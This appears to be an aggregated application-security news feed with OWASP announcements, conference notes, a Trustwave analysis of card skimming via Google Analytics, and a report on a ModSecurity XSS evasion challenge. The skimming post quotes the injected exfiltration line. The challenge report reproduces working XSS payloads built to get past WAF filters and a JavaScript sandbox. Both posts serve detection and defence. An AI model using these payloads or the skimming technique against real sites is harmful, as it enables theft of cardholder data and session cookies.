Shared posts

05 Nov 14:40

How To Start With Software Security – Part 2

by Ray Sinnema

Last time, I wrote about how an organization can get started with software security.

Today I will look at how to do that as an individual.

From Development To Secure Development

As a developer, I wasn’t always aware of the security implications of my actions.

Now that I’m the Engineering Security Champion for my project, I have to be.

It wasn’t an easy transition. The security field is vast and I keep learning something new almost every day. I read a number of books on security, some of which I reviewed on this site.

As an aspiring software craftsman, I realize that personal efforts are only half the story. The other half is the community of professionals.

Secure Development Communities

I'm lucky to work in a big organization, where such a community already exists.

EMC’s Product Security Office (PSO) provides me with a personal security adviser, maintains a security-related wiki, and operates a space on our internal collaboration environment.

If your organization doesn't have something like our PSO, you can look elsewhere. (And if it does, you should look outside too!)

OWASP is a great place to start.

They actually have three sub-communities, one of which is for Builders.

But it’s also good to look at the other sub-communities, since they’re all related. Looking at things from the perspective of the others can be quite enlightening.

That’s also why it’s a good idea to attend a security conference, if you can. OWASP holds annual AppSec conferences in three geos. The RSA Conference is another good place to meet your peers.

If you can’t afford to attend a conference, you can always follow the security section of Stack Exchange or watch SecurityTube.

Contributing To The Community

So far I’ve talked about taking in information, but you shouldn’t forget to share your personal experiences as well.

You may think you know very little yet, but even then it's valuable to share.

It helps to organize your thoughts, which is crucial when learning, and you may find you gain insights from the comments readers leave as well.

More to the point, there are many others out there who are getting started and who would benefit from seeing they are not alone.

Apart from posting to this blog, I also contribute to the EMC Developer Network, where I’m currently writing a series on XML and Security.

There are other ways to contribute as well. You could join or start an OWASP chapter, for instance.

What Do You Think?

How did you get started with software security? How do you keep up with the field? What communities are you part of? Please leave a comment.


Filed under: Application Security, Information Security, Software Development Tagged: AppSec, blog, Builders, community, EDN, EMC, OWASP, RSA Conference, security, SecurityTube, software craftsmanship, Stack Exchange, XML
29 Oct 18:23

Steve Lipner – The Security Development Lifecycle at Microsoft

by Trusted Software Alliance
“I think we have a long way to go to get the broad understanding of what security really means in …

Continue reading »

29 Oct 16:15

John Steven – Measuring the Cost of Application Security

by Trusted Software Alliance
“If you take the big, monolithic testing effort you currently have at the end, and you push it towards the …

Continue reading »

23 Oct 20:09

Card Data Siphon with Google Analytics

by Richard Wells

The introduction of EMV (Chip & Pin) payment devices in 2003 resulted in a rapid decline in physical credit card cloning in Europe. EMV technology has also led to an increase in attacks on e-commerce systems targeting cardholder data.

Each year, Trustwave SpiderLabs investigates hundreds of incidents of data compromise. I work on some of these investigations and occasionally get to evaluate some rather unusual attack vectors. This blog post details a novel data extraction technique using Google Analytics that I found during a recent investigation. We have evidence of this technique being used in the wild. For the purposes of this article, however, I have replicated the attack in a test environment.

Once an attacker accesses an e-commerce system, their next step is locating cardholder data. In most of my investigations, I see attackers either download stored credit card data or modify source code to capture data as it passes through the system and then send it back to their own system. In this particular case, the merchant did not store credit card information. As a result, the attackers captured the data as it entered the system and then siphoned it to their own system.

We see many forms of real-time capturing of credit card data. In the majority of cases, attackers change a payment page’s source code to send the data to an e-mail address, a different server via POST requests, or a storage file for later collection. These techniques rely on the merchant’s server sending the data outbound or storing it internally, which could be detected by network monitoring.

In this case, whilst reviewing the source code for the merchant’s payment pages, I noticed that a line had been added at the bottom of the page. That line of code appeared to collect data entered into the credit card fields in a base64 encoded string:

[Screenshot 1: the injected line of code]

At this point, I’d expect to see the php variable ‘$a’ being sent to a malicious IP address but couldn’t find any evidence of this. After further review of the source code, I found the variable ‘$a’ being referenced in the following piece of code:

[Screenshot 2: the code referencing the '$a' variable]

This modified source code instructs the customer's browser to send the string '$a' - which contains the customer's base64 encoded credit card data - to Google Analytics via JavaScript. The attacker had replaced the merchant's Google Analytics account ID with his own - 'UA-00000000-1'. The other line added, _gaq.push(['_set', 'page', '".$a."']), passed the base64 encoded string '$a' to Google Analytics as a page name variable.

Even the most savvy of customers, those who monitor their HTTP requests, could fail to identify this malicious activity. The base64 encoded string is not displayed on the page, and the outbound request is sent to the trusted Google brand. The requests do not seem out of the ordinary as the merchant’s website already used Google Analytics.

With these modifications in place, the attackers can sit back and let the credit cards roll in. Once a week they can log in to their Google Analytics accounts and harvest cardholder data via the base64 encoded page names.

After discovering this innovative use of Google's JavaScript to extract credit card data, I wanted to test it independently. To demonstrate, I set up my own Google Analytics account and created base64 encoded strings similar to:

Original: Richard|Wells|4111111111111111|1234|123|ITWORKS
Base64: UmljaGFyZHxXZWxsc3w0MTExMTExMTExMTExMTExfDEyMzR8MTIzfElUV09SS1M=
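As a quick sanity check (a minimal Python sketch of my own, not part of the original investigation), the encoding round-trips exactly as shown above:

    import base64

    original = b"Richard|Wells|4111111111111111|1234|123|ITWORKS"

    # Encode the pipe-delimited card data the way the injected code would
    encoded = base64.b64encode(original).decode()
    print(encoded)
    # UmljaGFyZHxXZWxsc3w0MTExMTExMTExMTExMTExfDEyMzR8MTIzfElUV09SS1M=

    # Decoding the harvested page name recovers the cardholder data
    print(base64.b64decode(encoded).decode())
    # Richard|Wells|4111111111111111|1234|123|ITWORKS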

These strings were then sent from a website to my Analytics account, using hacked JavaScript. Once I logged in to Google Analytics I was presented with the following screen:

[Screenshot: the Google Analytics report showing the encoded page name]


The truncated string in the ‘Page’ field can be found in full within the Google Analytics source code:

[Screenshot: the full string within the Google Analytics source code]
Decoding the string provides me with the original message, or in the case of our attackers – the credit card details. My next question was, “While the extraction method works, what can be seen from the client side?”.

The browser just shows a Google Analytics request, posting a base64 string, which wouldn’t look out of place on most websites.
Firebug - Google Analytics posting the base64 string (blanked)

It is interesting to note that at no point in this process did I have to verify with Google that I was the owner of the webpage. This is a potential issue that could be resolved by only allowing one registered Analytics user per domain.

Using Google Analytics to extract credit card data is stealthy: no data is passed directly from the merchant's server, so it will not appear in web logs, and anti-virus will not detect it. The best methods to defend against these sorts of attacks are File Integrity Monitoring and alerting on any changes made to the source code. Setting appropriate read-only permissions for the web users would also help to defend against real-time capture of credit cards.

23 Oct 20:08

Simon Bennetts – The OWASP Web Applications Vulnerability Project

by Trusted Software Alliance
In this morning’s news I saw a reference to a project on OWASP that documents the vulnerabilities in web applications …

Continue reading »

23 Oct 20:07

A Default Base of XSS

by Mike
Modern PHP has successfully shed many of the problematic functions and features that contributed to the poor security reputation the language earned in its early days. Settings like safe_mode mislead developers about what was really being made “safe” and magic_quotes caused unending headaches. And naive developers caused more security problems because they knew just enough […]
23 Oct 20:04

Securing Source Code Building Servers in the SDLC – Talking Code Part 8

by Cobhan Phillipson

Talking Code episode 8 is here and it’s question time for Paul Roberts, Chris Wysopal and Joshua Corman. This week’s discussion centers around securing source code build servers in the SDLC – an issue that concerns both supply chain and operational security.

Every week we will be releasing another webisode of Talking Code but if you want to watch the whole series, simply fill out the form at this link and get watching!

15 Oct 19:54

Application-Layer Denial of Service Attacks

We often hear about infrastructure denial of service (DoS) attacks, but traditionally there has not been much data available on application-layer DoS.

One of the charts from the Q2 2013 DDoS Attack Report

The Prolexic Distributed DoS (DDoS) attack report includes a comprehensive analysis of data from their own networks. Application-layer attacks against their clients accounted for 25% of attacks, with the remainder against infrastructure (OSI layers 3 and 4). For the infrastructure attacks, SYN floods accounted for almost half of all attacks (the report's text says 31.22% of infrastructure attacks, but the data in Figure 3 suggests it is 31.22% of all attacks).

The number of attacks has risen by a third, but it is not clear whether this is due to the company having more clients, or because there were more attacks against each client. The points I found of most interest:

  • Compromised web servers are now the preferred method of attack, not a botnet of home PCs
  • An average attack lasts less than two days
  • The average bandwidth is almost 50 Gbps, but half of attacks are less than 5 Gbps, and a fifth are less than 1 Gbps
  • GET floods account for the majority of application-layer DDoS attacks
  • Many low-volume attacks are easy to launch without significant skill
  • Amplification attacks, in which the attacker spoofs the identity of the ultimate target and sends requests to intermediary victim servers, are favoured due to the additional impact and source obfuscation.

The reports are free to download after registration.

See also previous posts on Denial of Service Attack Defences and Distributed Denial of Service Attacks.

Application-Layer Denial of Service Attacks

Clerkendweller

14 Oct 17:25

The Projects Summit 2013 is happening: GET INVOLVED!!!!

by Dinis Cruz
Here is the announcement email from Samantha Groves sent to the OWASP Leaders list:

    Hello Leaders,

    This message is just to get the conversation started. I was in the AppSec USA planning meeting yesterday, and everyone on the call was thrilled with what we are doing! They are very excited to see this happen so we need to get moving on some of these items. First up, is sorting out what the working sessions will be, then I can get a tentative schedule sorted for us. Here are the tentative Track and Session topics: https://www.owasp.org/index.php/Projects_Summit_2013


    Projects Track - Project Reviews Session: Johanna Curiel Leading

    ESAPI Hackathon: Chris and Kevin, as I told Simon, feel free to change everything that is on the working session pages. I just put that information on there based on what we had discussed earlier. Please feel free to be creative with what you want to do. What would benefit the project most? Reach out to me if you have questions. 

    University Outreach, Education and Training: Martin and Kostas... Same as I told Simon, Chris, and Kevin. The template is there, now it is just up to you if/what you want to do. 

    Writing, Proofreading, and Technical Editing: Michael Hidalgo is taking this on. Michael, feel free to edit these as you wish. The only vision I have for this session is that we should proofread and edit a handful of our new guides/project books. We can do that there or before. Call me if you want to talk about this more. 

    Product Development and Reference Implementation: These sessions still need a leader. If no one is interested in them, we can drop them and replace them with something else. 

    Zap Hackathon: You know what to do, Simon.

    New Addition: Jack Mannino is in for the Summit. He is doing a Mobile Security session. 

    Session Leaders, have a think about what day you want to have the sessions you are leading take place. 

    For all OWASP Leaders: There is opportunity to change everything right now so reach out to us if you want to participate in any of the sessions above, or if you have ideas for other tracks and sessions. 

    Reach out to me if you have questions: I am always here. ;-)

    Thank you, Leaders.

    SG

So, if you have an OWASP Project that you are currently using, leading or contributing to, then this is the place to be involved.

And as with the last Summits (at this stage of planning), there is still plenty of time and space to add more Working Sessions, so if you have ideas (or want to lead one), then create a new Working Session and add it to: https://www.owasp.org/index.php/Projects_Summit_2013
14 Oct 02:45

OWASP Top 10 – A1 Injection « Le Blog d'Ippon Technologies

Description. The attacker sends untrusted data that will be injected in the targeted application to change its behaviour. The goal of this attack is usually to steal ...
08 Oct 20:55

Attention, CISOs: Strategy is the only security

OWASP Guide project leader Marco Morana outlines ideal application security strategies
07 Oct 13:18

Jack Mannino – Build Security into Mobile

by Trusted Software Alliance
“Enterprise security has actually become dependant upon how we can identify people at the mobile layer.” — Jack Mannino When …

Continue reading »

07 Oct 13:17

DOM-Based Cross Site Scripting

A new paper describes problems caused by the insecure handling of untrusted data flowing through JavaScript from attacker-controlled sources, such as the document.location property, into security-sensitive DOM components of an HTML page.

Partial image of a page from the paper '25 Million Flows Later - Large-scale Detection of DOM-based XSS'

Sebastian Lekies, Ben Stock and Martin Johns present an automated method to detect DOM-based cross site scripting (XSS) vulnerabilities in their paper 25 Million Flows Later - Large-scale Detection of DOM-based XSS.

The paper describes a taint-tracking approach for detection, an automated vulnerability validation mechanism and the results of a study examining over half a million pages from the Alexa top 5000 websites.

The results? Well, read the paper. Then go and fix your site!

DOM-Based Cross Site Scripting

Clerkendweller

07 Oct 13:14

OWASP Mobile Security Project | Information Security 101

If you've ever talked infosec with me, you've no doubt noticed that I love the OWASP Top 10 Project. Every few years, they update their list of the 10 most ...
01 Oct 19:50

2013 OWASP Top 10 - SlideShare

2013 OWASP Top 10 presentation, slightly modified for a presentation I did at the Lasso Developer Conference in Niagara Falls.
30 Sep 16:47

Joe Jarzombek – Security is not just about Software

by Trusted Software Alliance
“Some of the common weaknesses are not at the code level. Over 2/3 are at the code level, but the …

Continue reading »

30 Sep 16:46

Scaling Web Security - JavaOne Security Talk

by Michael Coates
This week I spoke at JavaOne on scaling web security programs. It was a great event and I enjoyed the chance to speak to a great crowd of developers and security individuals.

Presentation below. Enjoy.





-Michael Coates - @_mwc
30 Sep 16:46

Java Tainted Strings

by Dinis Cruz
At AppSec EU Steven van der Baan approached me with the great idea of seeing if we could do an open source implementation of Java Tainted Strings.

The idea is to (somehow) add metadata to the java.lang.String object and allow an App (or APIs) to taint a string (i.e. mark it as 'potentially malicious') and to modify that App/API's behaviour based on the taint information (for example, "don't execute an SQL statement if its SQL command string is tainted").
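To illustrate the general idea (a minimal, hypothetical sketch in Python rather than Java, since the java.lang.String metadata mechanism is still an open question), a tainted value can carry a flag that security-sensitive APIs check before acting:

    class TaintedStr(str):
        """A str subclass carrying a taint mark; concatenation preserves it."""

        def __add__(self, other):
            return TaintedStr(str.__add__(self, other))

        def __radd__(self, other):
            return TaintedStr(str.__add__(other, self))


    def execute_sql(statement):
        """A security-sensitive API that refuses tainted command strings."""
        if isinstance(statement, TaintedStr):
            raise ValueError("refusing to run SQL built from tainted input")
        print("executing:", statement)


    user_input = TaintedStr("1 OR 1=1")   # data from an untrusted source is tainted
    query = "SELECT * FROM users WHERE id = " + user_input   # taint propagates
    execute_sql(query)                    # raises ValueError

The real challenge, as noted above, is doing this transparently for java.lang.String itself rather than for a wrapper type.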

There is still a lot of thinking that needs to happen on this idea, and we are currently in the 'pre PoC' stage.

Steven and I are going to try to document our ideas; here are the first two from him:

It starts with an idea



Where to start



Please let us know of your ideas, or other good resources/thinking on this.

For example, here are a couple of interesting documents I quickly found by searching for 'Java tainted strings' on Google:




30 Sep 05:37

OWASP ASVS for Web Applications 2013 Beta Release

OWASP's less well known, but immensely useful, Application Security Verification Standard (ASVS) for web applications has been updated and a beta version was released just prior to AppSec EU last month.

Diagram from the OWASP ASVS Web Application Standard 2013 showing the four different web application security verification levels

The ASVS Web Application Standard 2013 defines a set of technical controls for applications that should be verified as part of security testing processes. They are primarily application controls but also include relevant ones in the host environment. The document describes three use cases — for application certification, for alignment of testing methodology and for selection of external suppliers.

The number of requirement classes has been expanded to 13, and they now cover:

  • Authentication
  • Session management
  • Access control
  • Input validation
  • Cryptography at rest
  • Error handling and logging
  • Data protection
  • Communications
  • HTTP
  • Malicious controls
  • Business logic
  • Files and resources
  • Mobile.

Each class includes around 10-20 specific requirements. The new sections and the re-allocation of some requirements mean that the numbering has changed significantly. Cross-referencing will be important for those already using the ASVS Web Application Standard 2009.

Not all the requirements need to be achieved for every application. The choice can clearly be organisation-specific, based on its own risk assessment, but the document describes four levels of verification, each successive level increasing the number of mandatory requirements.

The project team, primarily Andrew van der Stock, Sahba Kazerooni, Daniel Cuthbert, and Krishna Raja, are working on gathering feedback from the community, creating use-case examples, and mapping to other OWASP projects such as the upcoming new Developer and Testing Guides.

Please help by providing your own ideas to finalise the beta release via the project's mailing list.

OWASP ASVS for Web Applications 2013 Beta Release

Clerkendweller

26 Sep 00:14

OWASP Foundation: New York Times CTO; Senior Executives from ...

NEW YORK, Sept. 24, 2013 /PRNewswire-USNewswire/ -- OWASP AppSec USA (www.appsecusa.org), the premier security conference for Builders, Breakers ...
25 Sep 17:17

Moderated Application Security News Feed from OWASP

by Michael Coates
OWASP's moderated application security news feed has returned! We have a new RSS link so please update your RSS readers with the new information.

The Feed: http://feeds.feedblitz.com/OWASP
Syndicated on twitter: @OWASP_feed

Know of a good application security blog that should be included? Please submit it for consideration here. Lastly, OWASP is free and open so if you're curious how the AppSecNews feed is run then check out the details here.

Many thanks to Jeff Williams for running the AppSecNews feed for the first 8 years. Thanks also to Jim Manico and Sarah Baso for investigating various platforms to restart the new AppSecNews feed!


-Michael Coates - @_mwc
24 Sep 23:08

Guidelines of OWASP

by Dinis Cruz
OWASP got a great mention in this EU regulation document, which is aimed at laying down technical specifications for online collection systems pursuant to Regulation (EU) No 211/2011 of the European Parliament and of the Council on the citizens' initiative.



Do a search for OWASP and you will find two references, the second being this one:


This is great, but what are these 'Guidelines of OWASP'?

Ideally we should have a series of very explicit and focused 'Guidelines' to answer this question :)

To kickstart this process I created the Guidelines of OWASP page at the OWASP Wiki, so if you have some cycles, please chip in with your views:


24 Sep 03:36

AppSecEU Research 2013 Part 2

... Continued from Part 1. As usual with these types of events, in AppSecEU 2013 I had already missed a number of talks on other tracks on fascinating and useful topics by great presenters.

Photograph taken during OWASP AppSec EU Research 2013 showing Roberto Suggi Liverani presenting

I continued the first day by listening to Roberto Suggi Liverani discuss using browser automation frameworks and web proxy APIs to assist the assessment of client-side applications. He demonstrated the use of a Burp Suite extension called CSJ that combines Crawljax, JUnit and Selenium WebDriver. [video]

Photograph taken during OWASP AppSec EU Research 2013 showing a view of Hamburg taken from the conference venue

With the unfortunate absence of Gareth Heyes, Erlend Oftedal stepped in to provide a presentation about implementing and testing RESTful web services. He described common difficulties such as session timeout, third party authentication, anti CSRF tokens, cryptography, access control, replay attacks, and XML attacks. He presented a series of recommendations to avoid common pitfalls. [video]

Photograph taken during OWASP AppSec EU Research 2013 showing a flip chart used during one of the Open Source Showcase discussions

Throughout both conference days an open source security showcase was running, with each project having a dedicated room and expert available for discussion, assistance and hands-on demonstration. These proved to be very popular due to the quality of the topics and facilitators.

Florian Stahl and Johannes Stroeher jointly presented a methodical approach for testing mobile applications that included information gathering, threat modelling, enumeration, code and component review and dynamic testing. [video]

Photograph taken during OWASP AppSec EU Research 2013 of one of the break-out areas

Two locations were provided for refreshment and food breaks, one on each conference level. These were heavily used by the delegates and were also where there was an opportunity to meet with the various conference sponsors and other supporters.

To conclude the first day, I listened to the final talk on the HackPra track by the track's enigmatic co-organiser Mario Heiderich. He discussed XSS attacks and how it is normally possible to bypass any form of filtering, especially when there are bugs in the web browsers themselves, unless a strict whitelist approach is used. He reiterated that it is important to be extremely wary of user-generated CSS. [video]

On the Thursday evening, we were treated to the conference dinner on board the museum cargo ship Cap San Diego. And some beers. Pre-dinner drinks were available on the deck, dinner was on two levels within the extensive cargo hold, and there was an opportunity to have a guided tour of the vessel afterwards with one of the former sailors.

Photograph taken during OWASP AppSec EU Research 2013

Continues in Part 3...

AppSecEU Research 2013 Part 2

Clerkendweller

23 Sep 17:58

ModSecurity XSS Evasion Challenge Results

by Ryan Barnett

On July 30th, we announced our public ModSecurity XSS Evasion Challenge.  This blog post will provide an overview of the challenge and results.

Value of Community Testing

First of all, I would like to thank all those people that participated in the challenge.  All told, we had > 730 participants (based on unique IP addresses), which is a tremendous turnout.  This type of community testing has helped to both validate the strengths and expose the weaknesses of the XSS blacklist filter protections of the OWASP ModSecurity Core Rule Set Project.  The end result of this challenge is that the XSS Injection rules within the CRS have been updated within the Trunk release in GitHub.

XSS Evasion Challenge Setup

The form on this page is vulnerable to reflected XSS. Data passed within the test parameter (either GET or POST) will be reflected back to this same page without any output encoding/escaping.

XSS Defense #1: Inbound Blacklist Regex Filters

We activated updated XSS filters from the OWASP ModSecurity Core Rule Set (CRS).  When clients send attack payloads, they are evaluated by the CRS rules and then the detection scores are propagated to the HTML form as such: 

CRS XSS Anomaly Score Exceeded (score 10): NoScript XSS InjectionChecker: HTML Injection
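As a rough illustration of how anomaly scoring works (a toy Python sketch with made-up rules and scores, not the actual CRS implementation), each matching rule adds to a per-request score and the request is flagged once a threshold is exceeded:

    import re

    # Hypothetical blacklist rules with per-rule anomaly scores (not real CRS rules)
    RULES = [
        (re.compile(r"<script", re.IGNORECASE), 5),
        (re.compile(r"on\w+\s*=", re.IGNORECASE), 5),
    ]
    THRESHOLD = 10

    def anomaly_score(payload):
        # Sum the scores of every rule that matches the payload
        return sum(score for pattern, score in RULES if pattern.search(payload))

    payload = "<script>window.onload=stealCookies()</script>"
    score = anomaly_score(payload)
    if score >= THRESHOLD:
        print("CRS XSS Anomaly Score Exceeded (score %d)" % score)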

We added XSS filter regular expressions from the following 3rd party sources:

XSS Defense #2: JS Sandbox Injection

This defensive layer uses ModSecurity's Data Modification capability (@rsub operator) to dynamically insert Gareth Heyes' (@garethheyes) JS Sandbox, MentalJS, at the beginning of HTML responses.
It is important to understand what a JS sandbox is and how it works. You may be able to execute JS code, but it runs in a sandboxed environment. For example, preventing a JS alert popup box is not the goal here; rather, the goal is protecting DOM elements from being accessed.

In some cases, MentalJS prevents the injected code from executing at all.  In other cases, the code will execute, however it does so from within a JS sandbox.  The result is that the code is not able to access DOM elements outside of the sandbox.  For instance, if an injection attempts to access document.cookie, it returns data as "undefined" -

Screen Shot 2013-09-16 at 2.43.48 PM

Challenge Goals

The challenge was twofold: to win, participants needed to develop a single payload that achieved both of these goals:

1. Filter Evasion

You must execute a reflected XSS attack accessing one of the DOM elements listed below WITHOUT triggering an XSS filter alert.  Example -

No CRS XSS Filter Alerts Triggered (score 0)

Depending on the payload, you may need to review the raw HTML to verify the CRS score.

2. Escape from the MentalJS JavaScript Sandbox

You must bypass the MentalJS JS Sandbox protections and successfully execute a reflected XSS attack that executes JS code in your browser. A successful attack will be able to access one of the following DOM elements:
  1. Trigger the youWon JS function
  2. Access document.location that is not undefined or sandboxed
  3. Access document.cookie that is not undefined or sandboxed

Example -

image from npercoco.typepad.com
You may toggle the defenses on/off by checking the box in the form below. This includes disabling the MentalJS Sandbox injection and also adding the X-XSS-Protection: 0 response header to temporarily disable any browser-side XSS filtering. This will help to facilitate testing of working XSS payloads.

Challenge Results

While various community submissions did include bypasses for each of the two protection layers individually, there were no official winners who were able to bypass BOTH the CRS filters and break out of the MentalJS sandbox all within a single payload.  That being said, we do want to highlight the individual component bypasses as they still have value for the community.

OWASP CRS Filter Evasions

Evasion #1 - Nul Bytes inside Script Tags

Security Researcher Rafay Baloch actually was a bit ahead of the curve on this challenge as he notified us of a bypass using Nul Bytes within the JS script tag name just prior to the XSS Evasion Challenge being publicly announced. 

Screen Shot 2013-09-17 at 3.11.39 PM

He was testing our public Smoke Test page here.

Evasion #1 - Lesson Learned

Screen Shot 2013-09-17 at 3.15.43 PM

Evasion #1 - Analysis

As you can see from the output, rule ID 960901 triggered and was specifically designed to flag the presence of Nul Bytes.  We took this approach rather than attempting to deal with Nul Bytes within every remaining rule.  That being said, there is still a valid point here - if a Nul Byte can be used to obfuscate payloads and evade detections then this should be addressed specifically.

If we research Gareth Heyes' Shazzer online fuzzer info, we find that indeed IE v9 allows the use of Nul Bytes within the script tag name -

Screen Shot 2013-09-17 at 3.34.17 PM
The JSON export API shows the example vector payloads -

Screen Shot 2013-09-17 at 3.36.29 PM
So, by adding %00 within the script tag name, many of the XSS regular expression checks would not match, yet IE9 would still parse the tag correctly and execute JavaScript... Perfect.  

Evasion #1 - Lesson Learned

Strip Nul Bytes

To combat this tactic, we added the "t:removeNulls" transformation function action to our XSS filters:

Screen Shot 2013-09-18 at 2.15.28 PM
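To see why stripping nulls matters (a minimal Python sketch, not the actual ModSecurity rule), a null byte inside the tag name slips past a naive <script pattern unless the nulls are removed before matching:

    import re

    script_filter = re.compile(r"<script", re.IGNORECASE)

    payload = "<scr\x00ipt>alert(document.cookie)</scr\x00ipt>"

    # The raw payload evades the regex because of the embedded null byte
    print(bool(script_filter.search(payload)))                      # False

    # Removing null bytes first (what t:removeNulls does) restores detection
    print(bool(script_filter.search(payload.replace("\x00", ""))))  # True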

Test Shazzer Fuzz Payloads

This Nul Byte issue demonstrates just one difference in browser parsing quirks.  There are many, many others...  It is for this reason that we decided that, for regression testing of XSS filters, we needed to leverage the Shazzer dataset to identify payloads that trigger JS across multiple browser types and versions.  I created a number of ruby scripts that interact with the Shazzer API that can extract successful fuzz payloads and test them against the live XSS evasion challenge page running the latest OWASP ModSecurity CRS rules.

Screen Shot 2013-09-18 at 3.27.35 PM

Evasion #2 - Non-space Separators

Again Rafay Baloch sent in a submission that used this technique -

http://www.modsecurity.org/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E&disable_xss_defense=on&disable_browser_xss_defense=on

Screen Shot 2013-09-18 at 4.50.38 PM
We also received a similar submission from ONsec_lab:

http://www.modsecurity.org/demo/demo-deny-noescape.html?test=%3Cinput+onfocus%0B%3Dalert%281%29%3E&disable_xss_defense=on&disable_browser_xss_defense=on

image from pbs.twimg.com

Evasion #2 - Analysis

There are a number of characters that browsers will treat as "space" characters.  Here is a table of these characters for each browser type:

IExplorer = [0x09,0x0B,0x0C,0x20,0x3B]
Chrome = [0x09,0x20,0x28,0x2C,0x3B]
Safari = [0x2C,0x3B]
FireFox = [0x09,0x20,0x28,0x2C,0x3B]
Opera = [0x09,0x20,0x2C,0x3B]
Android = [0x09,0x20,0x28,0x2C,0x3B]

The evasion method used by both of these submissions was to place one of the characters in between the "onevent" name attribute (such as onmouseover and onfocus) and the equal sign (=) character -

  • onmouseover%0B=
  • onfocus%0B%3D

As you can see from the table above, Internet Explorer (IE) would treat the %0B character as a space and parse/execute the payload; however, it would bypass blacklist regular expression filters such as this -

(?i)([\s\"'`;\/0-9\=]+on\w+\s*=)

Screen Shot 2013-09-18 at 5.22.21 PM
The problem with this regex is its use of the "\s" meta-character, which does not cover the %0B character.

Evasion #2 - Lesson Learned

Similar to Evasion #1, we can utilize Shazzer Fuzz DB data to obtain payloads with these non-space characters separating on-event handlers.

Screen Shot 2013-09-18 at 5.40.53 PM

We modified our regex rules to catch these non-space characters:

Screen Shot 2013-09-18 at 5.48.30 PM

Here is what the updated regex visual looks like:

Screen Shot 2013-09-18 at 5.49.59 PM

We then ran our ruby scripts to extract and test this Shazzer Fuzz data against our rules to verify that they were caught:

Screen Shot 2013-09-18 at 5.43.02 PM
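As a rough cross-check (a Python sketch with a deliberately simplified pattern, not the actual CRS regex), explicitly listing the browser separator bytes in the character class catches the %0B variants:

    import re

    # Union of the separator bytes from the browser table above
    separators = "\x09\x0b\x0c\x20\x28\x2c\x3b"

    # Simplified on-event handler rule with an explicit separator class
    handler_filter = re.compile(r"on\w+[" + separators + r"]*=", re.IGNORECASE)

    payloads = [
        "<a onmouseover\x0b=location='...'>",   # separator before the equal sign
        "<input onfocus\x0b=alert(1)>",
    ]
    for p in payloads:
        print(bool(handler_filter.search(p)))   # True for both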

MentalJS Escaping

The second half of the challenge was to try and escape from the MentalJS sandbox and access the DOM elements.  There were a few people who were successful.  Remember, however, that while these payloads were able to break out of the MentalJS sandbox they were all caught by the regular expression filters.

Breaking the MentalJS Parser

The most interesting MentalJS bypass submission was from Roman Shafigullin, and it included a method of breaking the parser.  By analyzing the JS, he found that he could break the parsing by setting an empty script tag:

Screen Shot 2013-09-19 at 3.16.42 PM
With this as the payload, it then broke this section of the MentalJS parsing:

Screen Shot 2013-09-19 at 3.18.30 PM
He was then able to set the "src" attribute to anything he wanted and chose to pull in a JS file hosted from his own server:

Screen Shot 2013-09-19 at 3.20.22 PM
The resulting full payload returned the following:

Mentaljs

Resetting document.body.innerHTML

 

Guiseppe Trotta sent in the first successful submission.

Screen Shot 2013-09-19 at 1.27.24 PM
Here were the payloads he used -

Screen Shot 2013-09-19 at 1.28.51 PM
There were others who submitted similar payloads that used document.body.innerHTML to override the MentalJS sandboxing -

  • Nicholas Mavis
  • Rafay Baloch

DOM Events Missing from Sandbox

There are a few DOM events that are not covered within the current version of MentalJS including:

  • expression:
  • background:url(javascript:...)
  • detachEvent
These were also reported by Vladimir Vorontsov in the sla.ckers.org forum.

Conclusions

Ok, so in this conclusion section, I am going to hit you with some Earth-shattering revelations!  No, not really.  What I will cover here, however, is information that reinforces security themes you have heard before, backed by relevant attack testing data.

Attack-Driven Testing Is Essential

Trust, but Verify - Ronald Reagan.

Our rules are of a high quality because they have been field tested by the community.  Only when top-tier web app pentesters focus some QA effort on the rules will they become better.  It is through these types of public, community hacking challenges that we are able to strengthen our rules.  The question is - what are other WAF vendors doing to test their rules???

Blacklist Filtering Alone Is Not Enough 

Negative security models used on their own are not enough to prevent a determined attacker.  It is only a matter of time before an attacker identifies an evasion method.  While this is true, negative security models do still have value:

  • They easily block the bulk of attacks.  We received more than 8,400 attacks during the challenge and only a couple were successful in bypassing the filters.
  • They force attackers to use manual testing.  If an attacker wants to bypass good negative security filters, they must be willing to use their own skills and expertise to develop a bypass.  Most of these evasions are not present within testing tools.  This increases resistance time to allow security personnel to respond.
  • They help to categorize attacks.  Without negative security filters, injection attacks could not be labeled and would reside within a generic "parameter manipulation" event from violations of input validation rules.  With a negative security model, you can put attacks into groups for XSS, SQL Injection, Remote File Inclusion, etc...

Beyond Regular Expressions

There are many other methods of detecting malicious payloads besides regular expressions.  Some other examples are:

  • Bayesian Analysis - this helps by identifying attack payload likelihood rather than the binary yes or no of regular expressions.  See this blog post for an example of Bayesian analysis.  When running these payloads against our Bayesian analysis rules, they were flagged:
Screen Shot 2013-09-20 at 9.36.26 AM

Security in Layers (server-side/client-side)

The combination of server-side blacklist filtering and a client-side JavaScript sandbox proved to be extremely effective.  While some submissions were successful in evading the filters, they were not able to break out of the MentalJS sandbox.  On the flip side, those submissions that were able to break out of the MentalJS sandbox were not able to evade the filters.  Use multiple different methods of identifying attacks to increase coverage and to compensate for weaknesses in other layers.

23 Sep 01:31

AppSecEU Research 2013 Part 1

I have been unable to make time to write up my notes from AppSecEU 2013 until today. Apologies for the delay, but I hope they are still of use. I have included links to the high-resolution videos of each talk mentioned which were published immediately after the event.

Photograph taken during OWASP AppSec EU Research 2013 showing the evening event held at Hamburg City Beach Club

The schedule had looked very enticing, and I had some ideas about what I would listen to and participate in. I arrived in Hamburg late on Wednesday afternoon just as the training courses were ending for the day. It seems the training had been a huge success with 120 attendees. After a quick refresh, I headed down to the Hamburg City Beach Club where OWASP had arranged a place for trainees, trainers, conference delegates, speakers and organisers to meet, network and socialise. It seems that apart from a real working port, Hamburg also has a sandy beach. It was a good place to catch up with friends, colleagues and a few new contacts, and have some beers.

On Thursday morning, the conference began with a welcome from Dirk Wetter, Conference Chair for the event. He welcomed the 400 delegates and explained arrangements, the layout of the split-level conference (on floor levels -2 and +23), and some special tips about not inadvertently activating the fire detection systems.

Photograph taken during OWASP AppSec EU Research 2013 showing Angela Sasse giving the conference keynote

